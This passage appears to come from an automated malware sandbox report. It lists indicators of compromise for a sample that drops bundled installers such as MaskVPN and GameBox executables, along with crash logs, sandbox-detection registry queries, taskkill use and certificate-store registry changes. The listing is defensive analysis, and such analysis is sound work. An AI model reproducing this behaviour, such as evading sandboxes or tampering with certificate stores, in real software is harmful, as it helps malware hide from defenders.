(x86)\MaskVPN\driver\winxp32\is-3CU9L.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-HV48E.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-8184K.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 7OVnKitPPGlsAcOvo9MED0Gp.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-DBPEM.tmp Setup.tmp File created C:\Program Files (x86)\GameBox INC\GameBox\tmp.edb md7_7dfj.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-6VJ6V.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\is-NE24K.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-I9D7R.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-BBTL3.tmp Setup.tmp File created C:\Program Files\Reference Assemblies\RIIBRHMIIJ\ultramediaburner.exe 3377047_logo_media.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe Setup.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe msedge.exe File created C:\Program Files (x86)\MaskVPN\Lejyluqaesae.exe 3377047_logo_media.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe 7OVnKitPPGlsAcOvo9MED0Gp.exe File created C:\Program Files (x86)\MaskVPN\is-S747Q.tmp Setup.tmp -
Drops file in Windows directory 27 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI63EA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6B4E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI465C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI57C4.tmp msiexec.exe File created C:\Windows\Installer\f76b87e.msi msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Installer\MSI5487.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF5ABC0473704B34F9.TMP msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log Cleaner.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\SystemTemp\~DFE82161FB0757BBFC.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\f76b87e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIDE94.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2DCF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI41A8.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI3542.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3B3E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4DDF.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 29 IoCs
pid pid_target Process procid_target 3280 2236 WerFault.exe 102 4776 4860 WerFault.exe 108 2764 1848 WerFault.exe 95 2036 4980 WerFault.exe 114 1036 4964 WerFault.exe 101 3684 4964 WerFault.exe 101 5204 4608 WerFault.exe 150 5532 4272 WerFault.exe 129 5720 4796 WerFault.exe 123 1584 3040 WerFault.exe 137 3140 2212 WerFault.exe 139 6884 6116 WerFault.exe 180 6536 676 WerFault.exe 136 2972 404 WerFault.exe 183 6140 5344 WerFault.exe 182 5196 5888 WerFault.exe 178 3080 1568 WerFault.exe 215 3668 6392 WerFault.exe 279 3936 4608 WerFault.exe 268 6000 5336 WerFault.exe 274 5296 5548 WerFault.exe 169 1120 6872 WerFault.exe 253 6336 4564 WerFault.exe 191 5640 3996 WerFault.exe 320 4236 736 WerFault.exe 260 1896 5572 WerFault.exe 341 4904 4360 WerFault.exe 407 4368 4788 WerFault.exe 422 4716 6312 WerFault.exe 434 -
Checks SCSI registry key(s) 3 TTPs 40 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Filters DrvInst.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4AEMR5olCp_tVzrTVx6ANnLU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4AEMR5olCp_tVzrTVx6ANnLU.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Filters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters DrvInst.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4AEMR5olCp_tVzrTVx6ANnLU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 Cleaner.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags Cleaner.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI yaA9xsNGEIw3vDLIIaEbBWpe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 Cleaner.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 Cleaner.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Service DrvInst.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI yaA9xsNGEIw3vDLIIaEbBWpe.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 Cleaner.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags Cleaner.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI yaA9xsNGEIw3vDLIIaEbBWpe.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\LowerFilters DrvInst.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Enumerates system info in registry 2 TTPs 53 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com -
Kills process with taskkill 2 IoCs
pid Process 5448 taskkill.exe 7100 taskkill.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created 